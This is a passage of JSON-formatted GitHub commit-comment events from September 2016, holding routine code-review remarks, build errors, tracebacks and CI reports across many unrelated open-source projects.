{"id":"4528687137","type":"CommitCommentEvent","actor":{"login":"JimHokanson"},"repo":{"name":"JimHokanson/matlab_standard_library"},"payload":{"comment":{"id":18930963,"position":null,"line":null,"path":null,"commit_id":"7be13d4131b18b35e5f344d5a81f521d3a94a2cf","created_at":"2016-09-07T16:12:09Z","updated_at":"2016-09-07T16:12:09Z","body":"That's really strange. If true, we should submit it as a bug. I just deleted the file in the parent folder and it works on my end. I noticed there are also copies of the files in mex__goDebug, these aren't necessary and are not accessible unless the mex__goDebug folder has specifically been added to the Matlab path (which shouldn't be done). I've deleted those as well and will sync in a sec."}},"created_at":"2016-09-07T16:12:09Z"}
{"id":"4528687557","type":"CommitCommentEvent","actor":{"login":"NdrZnCh"},"repo":{"name":"NdrZnCh/Surface"},"payload":{"comment":{"id":18930964,"position":null,"line":null,"path":null,"commit_id":"719f6c5ad2d4ca0066c733240219270188dc2014","created_at":"2016-09-07T16:12:13Z","updated_at":"2016-09-07T16:12:13Z","body":"ok"}},"created_at":"2016-09-07T16:12:13Z"}
{"id":"4528689383","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18930965,"position":null,"line":null,"path":null,"commit_id":"c5eaa1a9637b9387114d849c5d1c14504f9e7f1c","created_at":"2016-09-07T16:12:32Z","updated_at":"2016-09-07T16:12:32Z","body":"I fail to see the problem in this.  I thank you so much for taking this stone-age relic into the space age :-D My plan for the ESP32 is to try to strip everything down and make this system compatible with it."}},"created_at":"2016-09-07T16:12:32Z"}
{"id":"4528698170","type":"CommitCommentEvent","actor":{"login":"taurus8"},"repo":{"name":"GNS3/gns3-server"},"payload":{"comment":{"id":18930986,"position":null,"line":null,"path":null,"commit_id":"436543d8b82a1b49c52cd6defa38fe25b3caf22b","created_at":"2016-09-07T16:13:58Z","updated_at":"2016-09-07T16:13:58Z","body":"In line 39 you should change \"Profil settings\" to \"Profile settings\" i guess :)"}},"created_at":"2016-09-07T16:13:58Z"}
{"id":"4528701621","type":"CommitCommentEvent","actor":{"login":"Sigfried"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":18930994,"position":null,"line":null,"path":null,"commit_id":"de2e3978e0d8abdb5b3b140edefe5deadcaa78b2","created_at":"2016-09-07T16:14:31Z","updated_at":"2016-09-07T16:14:31Z","body":"Hey Chris,\n\nI added the 4.1.5 version without getting rid of the earlier one just in\ncase it might break anything; but in ohdsi.util I am now using a feature\nthat requires 4.1.5. As far as getting from a cdn, that's fine with me.\n\nThanks,\nSigfried\n\nOn Wed, Sep 7, 2016 at 11:45 AM, Chris Knoll <notifications@github.com>\nwrote:\n\n> Hi, last update, I did some digging and it loos like as of 4.15.0 they do\n> use a UMD export on their builds, so this SHOULD be exported as a AMD\n> module. I checked this link:\n> https://cdn.jsdelivr.net/lodash/4.15.0/lodash.min.js\n>\n> To use this in ATLAS, we'd add this to the main.js require config in the\n> paths section:\n> \"lodash\": \"https://cdn.jsdelivr.net/lodash/4.15.0/lodash.min\"\n>\n> And then to use it in another module:\n>\n> define(['lodash'], function(_) {\n> // use lodash as _ here.\n> } );\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OHDSI/Atlas/commit/de2e3978e0d8abdb5b3b140edefe5deadcaa78b2#commitcomment-18930530>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABg28yKofe91wMGC9YGyCA49sFKkeRyjks5qntwGgaJpZM4J3D2F>\n> .\n>\n"}},"created_at":"2016-09-07T16:14:31Z"}
{"id":"4528702457","type":"CommitCommentEvent","actor":{"login":"Powersource"},"repo":{"name":"Powersource/Code-LTHGit2016"},"payload":{"comment":{"id":18930997,"position":null,"line":null,"path":null,"commit_id":"3a2ba0f929fbefe4f0b78e10b635bc33c8a69568","created_at":"2016-09-07T16:14:39Z","updated_at":"2016-09-07T16:14:39Z","body":" Beautiful"}},"created_at":"2016-09-07T16:14:39Z"}
{"id":"4528702716","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18930998,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T16:14:42Z","updated_at":"2016-09-07T16:14:42Z","body":"On Fedora 22,23,24:\r\n```traceback\r\nTraceback (most recent call last):\r\n  File \"/usr/bin/pdf-stapler\", line 9, in <module>\r\n    load_entry_point('stapler==0.3.3', 'console_scripts', 'stapler')()\r\n  File \"/usr/lib/python2.7/site-packages/staplelib/__init__.py\", line 11, in main\r\n    import stapler\r\n  File \"/usr/lib/python2.7/site-packages/staplelib/stapler.py\", line 9, in <module>\r\n    from . import commands, CommandError\r\n  File \"/usr/lib/python2.7/site-packages/staplelib/commands.py\", line 7, in <module>\r\n    import more_itertools\r\nImportError: No module named more_itertools\r\n```"}},"created_at":"2016-09-07T16:14:42Z"}
{"id":"4528706630","type":"CommitCommentEvent","actor":{"login":"ags131"},"repo":{"name":"seancl/screeps-grafana"},"payload":{"comment":{"id":18931009,"position":null,"line":null,"path":null,"commit_id":"6aec523afe75cb40830716f3c172bfceb3789831","created_at":"2016-09-07T16:15:20Z","updated_at":"2016-09-07T16:15:20Z","body":"Just a note, the current statsd agent doesn't flatten the structure, so nested objects are not compatible."}},"created_at":"2016-09-07T16:15:20Z"}
{"id":"4528715198","type":"CommitCommentEvent","actor":{"login":"ahirschberg"},"repo":{"name":"cs2340-group21/M2"},"payload":{"comment":{"id":18931025,"position":7,"line":34,"path":"src/main/java/edu/gatech/oad/antlab/person/Person5.java","commit_id":"8b28aa93799cc5a311bdf46f57692a5c77182b26","created_at":"2016-09-07T16:16:47Z","updated_at":"2016-09-07T16:16:47Z","body":"should be input.length(), code won't compile without it"}},"created_at":"2016-09-07T16:16:47Z"}
{"id":"4528718344","type":"CommitCommentEvent","actor":{"login":"davidker"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":18931041,"position":null,"line":null,"path":null,"commit_id":"fd1d88272c43a702f0b5825273c9e240fd6af590","created_at":"2016-09-07T16:17:18Z","updated_at":"2016-09-07T16:17:18Z","body":"This patch causes a checkpatch warning. Please remove the { } and resubmit. \r\n\r\n-- David"}},"created_at":"2016-09-07T16:17:18Z"}
{"id":"4528722892","type":"CommitCommentEvent","actor":{"login":"dpo"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":18931053,"position":33,"line":50,"path":"Formula/caf.rb","commit_id":"7b6c4fd194bef0cf6ebf0e2ccc6e0bbe634147d0","created_at":"2016-09-07T16:18:05Z","updated_at":"2016-09-07T16:18:05Z","body":"Much nicer and compact. Thanks!"}},"created_at":"2016-09-07T16:18:05Z"}
{"id":"4528723728","type":"CommitCommentEvent","actor":{"login":"alberto-acevedo"},"repo":{"name":"alberto-acevedo/cesium-navigation"},"payload":{"comment":{"id":18931055,"position":null,"line":null,"path":null,"commit_id":"e87c66ceafb4971b4f491d803bd84ce3a026ae95","created_at":"2016-09-07T16:18:14Z","updated_at":"2016-09-07T16:18:14Z","body":"There is no way at the moment to disable the event listeners for the controls via the options. Take a look to the NavigationViewModel.js class. All the mouse event handlers are defined in this class. You could add a boolean flag in the options that can be used to ignore the processing of the events inside the events handlers."}},"created_at":"2016-09-07T16:18:14Z"}
{"id":"4528724385","type":"CommitCommentEvent","actor":{"login":"chrisclark"},"repo":{"name":"groveco/django-sql-explorer"},"payload":{"comment":{"id":18931056,"position":null,"line":null,"path":null,"commit_id":"77e2778d2b76b2d5f90b6585041437ae5e4a9dbe","created_at":"2016-09-07T16:18:19Z","updated_at":"2016-09-07T16:18:19Z","body":"I don't actually remember, but there was some issue when it was in Beta. I just opened a PR for 1.10 compat, and you can keep an eye on it here: https://github.com/groveco/django-sql-explorer/pull/234\r\n\r\nlet's see if tests pass..."}},"created_at":"2016-09-07T16:18:19Z"}
{"id":"4528726782","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18931059,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T16:18:43Z","updated_at":"2016-09-07T16:18:43Z","body":"Mhm\r\n"}},"created_at":"2016-09-07T16:18:43Z"}
{"id":"4528729048","type":"CommitCommentEvent","actor":{"login":"RochesterinNYC"},"repo":{"name":"cloudfoundry/php-buildpack"},"payload":{"comment":{"id":18931066,"position":null,"line":null,"path":null,"commit_id":"3abbdf2c4cc928e0172f1d188ce8335c4474831c","created_at":"2016-09-07T16:19:05Z","updated_at":"2016-09-07T16:19:05Z","body":"Sorry @sesmith177, pushed as you since Chambers doesn't seem display the `git duet` pairs in the command prompt."}},"created_at":"2016-09-07T16:19:05Z"}
{"id":"4528736137","type":"CommitCommentEvent","actor":{"login":"eighteyes"},"repo":{"name":"matrix-io/matrix-firebase"},"payload":{"comment":{"id":18931082,"position":null,"line":null,"path":null,"commit_id":"a10f078bd5a76c8da70c1e09b24c0fd0b62375c7","created_at":"2016-09-07T16:20:17Z","updated_at":"2016-09-07T16:20:17Z","body":"Looks good\r\n"}},"created_at":"2016-09-07T16:20:17Z"}
{"id":"4528740519","type":"CommitCommentEvent","actor":{"login":"rafamanzo"},"repo":{"name":"mezuro/prezento"},"payload":{"comment":{"id":18931090,"position":null,"line":null,"path":null,"commit_id":"63b3fcf5d257b0a06d21134398a0e853d5689c92","created_at":"2016-09-07T16:20:55Z","updated_at":"2016-09-07T16:20:55Z","body":"Be careful about this. Prefer rebasing over merging. This keeps the commit tree cleaner and avoid possible repeated commits."}},"created_at":"2016-09-07T16:20:55Z"}
{"id":"4528746486","type":"CommitCommentEvent","actor":{"login":"F43nd1r"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":18931107,"position":122,"line":164,"path":"src/main/java/org/acra/util/IOUtils.java","commit_id":"7fe71d52d543fead39c43bddbfd54b835d52ff47","created_at":"2016-09-07T16:21:55Z","updated_at":"2016-09-07T16:21:55Z","body":"I think this should either use if(ACRA.DEV_LOGGING) or log.w (at least thats how its done everywhere else)."}},"created_at":"2016-09-07T16:21:55Z"}
{"id":"4528752564","type":"CommitCommentEvent","actor":{"login":"ip1981"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18931115,"position":28,"line":145,"path":"nixos/modules/system/activation/activation-script.nix","commit_id":"e7adde7abb7c24babbf0a0822b2724f525d12363","created_at":"2016-09-07T16:22:54Z","updated_at":"2016-09-07T16:22:54Z","body":"What if it's not extNfs? Maybe ro bind mount?"}},"created_at":"2016-09-07T16:22:54Z"}
{"id":"4528753194","type":"CommitCommentEvent","actor":{"login":"darealshinji"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18931116,"position":124,"line":411,"path":"src/plat/win32/detect.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T16:23:00Z","updated_at":"2016-09-07T16:23:00Z","body":"Thanks for the hint."}},"created_at":"2016-09-07T16:23:00Z"}
{"id":"4528753282","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18931117,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-07T16:23:01Z","updated_at":"2016-09-07T16:23:01Z","body":"@Seliro it's wrong?"}},"created_at":"2016-09-07T16:23:01Z"}
{"id":"4528753772","type":"CommitCommentEvent","actor":{"login":"nikhil18"},"repo":{"name":"Alucard24/Alucard-Kernel-jfltexx"},"payload":{"comment":{"id":18931118,"position":94,"line":126,"path":"arch/arm/mach-msm/alucard_hotplug.c","commit_id":"659c329e28ff02201bd8b357baa045a7e9ac1146","created_at":"2016-09-07T16:23:07Z","updated_at":"2016-09-07T16:23:07Z","body":"arch/arm/mach-msm/alucard_hotplug.c:126:26: error: 'MAX_FREQ_LIMIT' undeclared (first use in this function)\r\n  unsigned int min_freq = MAX_FREQ_LIMIT;\r\nany help thanks"}},"created_at":"2016-09-07T16:23:07Z"}
{"id":"4528755188","type":"CommitCommentEvent","actor":{"login":"tejaskotecha"},"repo":{"name":"moriony/silex-sentry-provider"},"payload":{"comment":{"id":18931128,"position":null,"line":null,"path":null,"commit_id":"da74b10e2dd6e5628250f08563a20b55cee04197","created_at":"2016-09-07T16:23:19Z","updated_at":"2016-09-07T16:23:19Z","body":"Thanks I will give it a try.\n\nOn Wed, Sep 7, 2016 at 1:31 AM, Vitaliy Chesnokov <notifications@github.com>\nwrote:\n\n> @tejaskotecha <https://github.com/tejaskotecha> See release 1.0.5\n> <https://github.com/moriony/silex-sentry-provider/releases/tag/1.0.5>. I\n> think it will help to solve your problem\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/moriony/silex-sentry-provider/commit/da74b10e2dd6e5628250f08563a20b55cee04197#commitcomment-18924726>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABxj_RNQH4vUA8ws5LkT89pC-GyosYYsks5qnnZggaJpZM4J2JJZ>\n> .\n>\n"}},"created_at":"2016-09-07T16:23:19Z"}
{"id":"4528755968","type":"CommitCommentEvent","actor":{"login":"yifan-gu"},"repo":{"name":"coreos/rkt"},"payload":{"comment":{"id":18931132,"position":149,"line":149,"path":"stage1/app-start/app-start.go","commit_id":"62120d5519d589f52820e8eb96c1cea8b3106a1a","created_at":"2016-09-07T16:23:27Z","updated_at":"2016-09-07T16:23:27Z","body":"@iaguis Want to touch a file `/stage1/rkt/status/${appname}-started` here to tell `rkt app status` about the state and started timestamp?"}},"created_at":"2016-09-07T16:23:27Z"}
{"id":"4528757424","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18931137,"position":null,"line":null,"path":null,"commit_id":"67959521490d7308084a9d8e9300125f16a5697a","created_at":"2016-09-07T16:23:41Z","updated_at":"2016-09-07T16:23:41Z","body":"cc @civodul "}},"created_at":"2016-09-07T16:23:41Z"}
{"id":"4528759174","type":"CommitCommentEvent","actor":{"login":"hyperNURb"},"repo":{"name":"google/ggrc-core"},"payload":{"comment":{"id":18931143,"position":4,"line":8,"path":"src/ggrc/assets/mustache/custom_attributes/modal_content.mustache","commit_id":"411f52c32f3cf098e35bf5aa2d684f8f6ff47604","created_at":"2016-09-07T16:23:59Z","updated_at":"2016-09-07T16:23:59Z","body":"You shouldn't add static properties like these, instead you should use Mustache helper for this - `{{#if_instance_of instance Assessment'}}`"}},"created_at":"2016-09-07T16:23:59Z"}
{"id":"4528759231","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18931144,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-07T16:24:00Z","updated_at":"2016-09-07T16:24:00Z","body":"wenn ich mir die aktuellste Version runterlade bekomme ich immer folgende Fehlermeldung:                                   Caused by: android.view.InflateException: Binary XML file line #14: Binary XML file line #14: You must supply a layout_width attribute.\r\n"}},"created_at":"2016-09-07T16:24:00Z"}
{"id":"4528762414","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18931151,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-07T16:24:33Z","updated_at":"2016-09-07T16:24:33Z","body":"...und die App stürzt ab. Bei dir auch?"}},"created_at":"2016-09-07T16:24:33Z"}
{"id":"4528766364","type":"CommitCommentEvent","actor":{"login":"yifan-gu"},"repo":{"name":"coreos/rkt"},"payload":{"comment":{"id":18931156,"position":32,"line":32,"path":"rkt/app_add.go","commit_id":"62120d5519d589f52820e8eb96c1cea8b3106a1a","created_at":"2016-09-07T16:25:13Z","updated_at":"2016-09-07T16:25:13Z","body":"@iaguis need to be able to override the appname as well/"}},"created_at":"2016-09-07T16:25:13Z"}
{"id":"4528768537","type":"CommitCommentEvent","actor":{"login":"PerBothner"},"repo":{"name":"jline/jline3"},"payload":{"comment":{"id":18931158,"position":null,"line":null,"path":null,"commit_id":"27c7827c47a6863180436bb12e57a9d4b52e6084","created_at":"2016-09-07T16:25:35Z","updated_at":"2016-09-07T16:25:35Z","body":"While disabling nativeSignals is an option, I think it is still a bug that (when nativeSIgnals *are* enabled) handleDefaultSignal does nothing.  Which means that (for example) ctrl-C gets ignored (except when actually inside readLine).\r\n\r\nI just made a pull request with a suggested fix."}},"created_at":"2016-09-07T16:25:35Z"}
{"id":"4528769702","type":"CommitCommentEvent","actor":{"login":"woodruffw"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18931161,"position":124,"line":411,"path":"src/plat/win32/detect.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T16:25:47Z","updated_at":"2016-09-07T16:25:47Z","body":"No problem. I see now that this is a commit and not a PR, so I'll review it more thoroughly whenever you think it's ready for merging."}},"created_at":"2016-09-07T16:25:47Z"}
{"id":"4528770298","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18931163,"position":65,"line":65,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-07T16:25:53Z","updated_at":"2016-09-07T16:25:53Z","body":"done"}},"created_at":"2016-09-07T16:25:53Z"}
{"id":"4528771836","type":"CommitCommentEvent","actor":{"login":"msangoi"},"repo":{"name":"eclipse/leshan"},"payload":{"comment":{"id":18931171,"position":86,"line":86,"path":"leshan-server-cf/src/main/java/org/eclipse/leshan/server/californium/impl/InMemoryLwM2mObservationStore.java","commit_id":"df29e7b361ee49422583af5386dff9cfd24cd7d1","created_at":"2016-09-07T16:26:10Z","updated_at":"2016-09-07T16:26:10Z","body":"@balsmn this branch does not depend on the 2.0.0-M1 release of Californium. You need to build the 2.0.x branch."}},"created_at":"2016-09-07T16:26:10Z"}
{"id":"4528773150","type":"CommitCommentEvent","actor":{"login":"amalshehu"},"repo":{"name":"amalshehu/exercism-python"},"payload":{"comment":{"id":18931174,"position":null,"line":null,"path":null,"commit_id":"822a14dd313c643a057c161912d7b2f01377c839","created_at":"2016-09-07T16:26:22Z","updated_at":"2016-09-07T16:26:22Z","body":"Thanks for your valuable comment.New messaging style will be applied on future commits."}},"created_at":"2016-09-07T16:26:22Z"}
{"id":"4528777256","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18931182,"position":11,"line":8,"path":"ui/search.jsx","commit_id":"58a24f394b9468add37759fad182b12a3318a804","created_at":"2016-09-07T16:27:04Z","updated_at":"2016-09-07T16:27:04Z","body":"Since you're using \"search\" in a few ways in this component, it may be worth being explicit about the `search` you're getting from props to avoid ambiguity about what that is.  You can mirror the name of the action creator to the action type it dispatches and call the action creator `performSearch` (also that keeps your naming convention consistent as you're already doing this for the other two action creators). "}},"created_at":"2016-09-07T16:27:04Z"}
{"id":"4528777693","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18931186,"position":28,"line":145,"path":"nixos/modules/system/activation/activation-script.nix","commit_id":"e7adde7abb7c24babbf0a0822b2724f525d12363","created_at":"2016-09-07T16:27:09Z","updated_at":"2016-09-07T16:27:09Z","body":"What filesystem won't support `chattr -i`?"}},"created_at":"2016-09-07T16:27:09Z"}
{"id":"4528782320","type":"CommitCommentEvent","actor":{"login":"emmacunningham"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":18931193,"position":33,"line":12,"path":"ui/search.jsx","commit_id":"58a24f394b9468add37759fad182b12a3318a804","created_at":"2016-09-07T16:27:54Z","updated_at":"2016-09-07T16:27:54Z","body":"Minor nitpick: `<Textbox />` (no space between opening bracket and component name)"}},"created_at":"2016-09-07T16:27:54Z"}
{"id":"4528783560","type":"CommitCommentEvent","actor":{"login":"jaredpar"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":18931196,"position":5,"line":142,"path":"src/Compilers/VisualBasic/Test/Semantic/Compilation/MyTemplateTests.vb","commit_id":"726cbcaa8886a06a59d32f05959f6c147af72db0","created_at":"2016-09-07T16:28:08Z","updated_at":"2016-09-07T16:28:08Z","body":"When disabling tests don't comment them out.  Instead use the `Skip` argument to `Fact`.  This allows us to properly track tests.  When commented out it's not tracked at all. "}},"created_at":"2016-09-07T16:28:08Z"}
{"id":"4528783748","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18931197,"position":null,"line":null,"path":null,"commit_id":"67959521490d7308084a9d8e9300125f16a5697a","created_at":"2016-09-07T16:28:11Z","updated_at":"2016-09-07T16:28:11Z","body":"Yes, you are right…\r\n\r\nBasically, `pkg-config` asked for `bindir` returns a directory while the `configure` script wants that to be an executable.\r\n\r\nSo I hack `/guile` after the detected path; next release of `libchop` should add `/guile` to the end of `$(pkg-config guile-2.0 --variable bindir)`"}},"created_at":"2016-09-07T16:28:11Z"}
{"id":"4528784169","type":"CommitCommentEvent","actor":{"login":"tylerschultz"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":18931199,"position":null,"line":null,"path":null,"commit_id":"3f55789f2fad91380a2cc7d432a73f084b4b79ae","created_at":"2016-09-07T16:28:14Z","updated_at":"2016-09-07T16:28:14Z","body":"Hallo. Grüß dich!\r\n\r\nWe ran this PR through our 257.x unit/int tests and saw some failures in ruby 1.9 tests. It fails to bundle because of the mime-types-data bump. We see that reverting it back to the previous lock version fixes the version incompatibility problem. We've committed/pushed these changes. Let us know if this gives you concern.\r\n\r\ncc @cppforlife @voelzmo @Kiemes \r\n\r\n--@DennisDenuto and Tyler"}},"created_at":"2016-09-07T16:28:14Z"}
{"id":"4528788741","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":18931216,"position":5,"line":45,"path":"Sources/Basic/LazyCache.swift","commit_id":"729639c4d8ff7cca06b711de33be06b5ad17c929","created_at":"2016-09-07T16:29:03Z","updated_at":"2016-09-07T16:29:03Z","body":"This isn't thread safe.\r\n\r\nI'm not sure this is the right use for `LazyCache`... it is really just intended to be a thread-safe version of the `lazy` language keyword. If clients need invalidation, it is probably the case they should be doing something else..."}},"created_at":"2016-09-07T16:29:03Z"}
{"id":"4528792709","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18931230,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T16:29:45Z","updated_at":"2016-09-07T16:29:45Z","body":"can not transfer players......"}},"created_at":"2016-09-07T16:29:45Z"}
{"id":"4528793040","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"voorhoede/fastatic"},"payload":{"comment":{"id":18931231,"position":5,"line":17,"path":".travis.yml","commit_id":"c598bc7999609ce2fe6ba4517a3baabead66315b","created_at":"2016-09-07T16:29:49Z","updated_at":"2016-09-07T16:29:49Z","body":"@jpsc I'd prefer `travis` scripts not to leak into `package.json`, but only be used the other way around. So instead I would do:\r\n```yml\r\n  script:\r\n  - npm run build\r\n  - node ./scripts/replace-react-paths-travis.js\r\n```\r\nAnd as far as that last script is concerned, I wouldn't put `travis` in the name. If anything, it's because of `gh-pages`. But really it's because of different root directories.\r\nHow about we start building everything to `build/fastatic/` including `build/fastatic/examples/`. That way we can copy whatever is inside `build/fastatic/` to `gh-pages` but have the same effect locally as the `start` script uses `build/` as it's root dir. We'd then end up with one script `rebase-react` that works both locally and on `gh-pages`."}},"created_at":"2016-09-07T16:29:49Z"}
{"id":"4528793319","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":18931233,"position":null,"line":null,"path":null,"commit_id":"7ab5b64dbca84dc5cfc87902870f59bbbc40c2de","created_at":"2016-09-07T16:29:52Z","updated_at":"2016-09-07T16:29:52Z","body":"Yeah, your probably right. That makes sense, I also added the export feature which could be useful. "}},"created_at":"2016-09-07T16:29:52Z"}
{"id":"4528795138","type":"CommitCommentEvent","actor":{"login":"dirkmueller"},"repo":{"name":"hreinecke/dracut"},"payload":{"comment":{"id":18931236,"position":38,"line":38,"path":"modules.d/99suse/parse-suse-initrd.sh","commit_id":"1202041ec3f7b2d8dd58999e72a309c9fba9069f","created_at":"2016-09-07T16:30:13Z","updated_at":"2016-09-07T16:30:13Z","body":"there is a syntax error here, should be \r\n\r\n```\r\n    if [ -n \"$mduuid\" ]; then\r\n```\r\n\r\n(missing space between '\"' and ']'\r\n"}},"created_at":"2016-09-07T16:30:13Z"}
{"id":"4528795207","type":"CommitCommentEvent","actor":{"login":"austin-rausch"},"repo":{"name":"austinkelleher/clickjacker-chrome-extension"},"payload":{"comment":{"id":18931238,"position":null,"line":null,"path":null,"commit_id":"9a0f92fff07044c06ef22f888540100a50ccb27b","created_at":"2016-09-07T16:30:14Z","updated_at":"2016-09-07T16:30:14Z","body":"Undo this, It's crap."}},"created_at":"2016-09-07T16:30:14Z"}
{"id":"4528798641","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18931244,"position":null,"line":null,"path":null,"commit_id":"8e5663fe2356e902d16c5544d4c1edd5664aa571","created_at":"2016-09-07T16:30:46Z","updated_at":"2016-09-07T16:30:46Z","body":"This error likely would have surfaced under Windows XP and Vista with testing under VS2002 and VS2003.\r\n\r\n```\r\n$ cat validat1-error.txt \r\nc++ -DDEBUG -g3 -O0 -Wno-deprecated-declarations -fPIC -pipe -D_GLIBCXX_DEBUG -c validat1.cpp\r\nvalidat1.cpp:1202: error: integer constant is too large for ‘long’ type\r\n```\r\n"}},"created_at":"2016-09-07T16:30:46Z"}
{"id":"4528799480","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18931248,"position":null,"line":null,"path":null,"commit_id":"f3d116f100224a6bfcce475c61abe2ffa8e2e497","created_at":"2016-09-07T16:30:54Z","updated_at":"2016-09-07T16:30:54Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2356 of 2365 tests passed, 49 test warnings)\n\n * 8 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 9 tests had: Table big diffs.\n * 57 tests had: AUD diffs.\n * 16 tests had: Table small diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3d116f100224a6bfcce475c61abe2ffa8e2e497-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.62%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T16:30:54Z"}
{"id":"4528803250","type":"CommitCommentEvent","actor":{"login":"xqianchen"},"repo":{"name":"xqianchen/saiyi"},"payload":{"comment":{"id":18931251,"position":null,"line":null,"path":null,"commit_id":"31d8b474cbe991ffb349d094020921924178cdfb","created_at":"2016-09-07T16:31:32Z","updated_at":"2016-09-07T16:31:32Z","body":"test saiyi for github"}},"created_at":"2016-09-07T16:31:32Z"}
{"id":"4528812303","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18931269,"position":null,"line":null,"path":null,"commit_id":"989a8b21c20ed81c978688fcf201b92d9abc4f78","created_at":"2016-09-07T16:33:08Z","updated_at":"2016-09-07T16:33:08Z","body":"Hola @Muchachito, comprobaste que en el original estén también esas comillas?\r\nGracias.\r\n"}},"created_at":"2016-09-07T16:33:08Z"}
{"id":"4528817177","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":18931284,"position":null,"line":null,"path":null,"commit_id":"a3e9d49cc849bf1e568f8d6b411cabf36b519765","created_at":"2016-09-07T16:33:57Z","updated_at":"2016-09-07T16:33:57Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/44/violations\n```\nplone/namedfile/copy.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/marshaler.py:8:1: C901 'If 8' is too complex (13)\nplone/namedfile/scaling.py:248:1: C901 'ImageScaling.create' is too complex (13)\nplone/namedfile/scaling.py:294:41: S001 found %r formatter\nplone/namedfile/tests/base.py:54:16: P301 format call provides unused index (1)\nplone/namedfile/tests/test_scaling.py:91:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:92:70: S001 found % 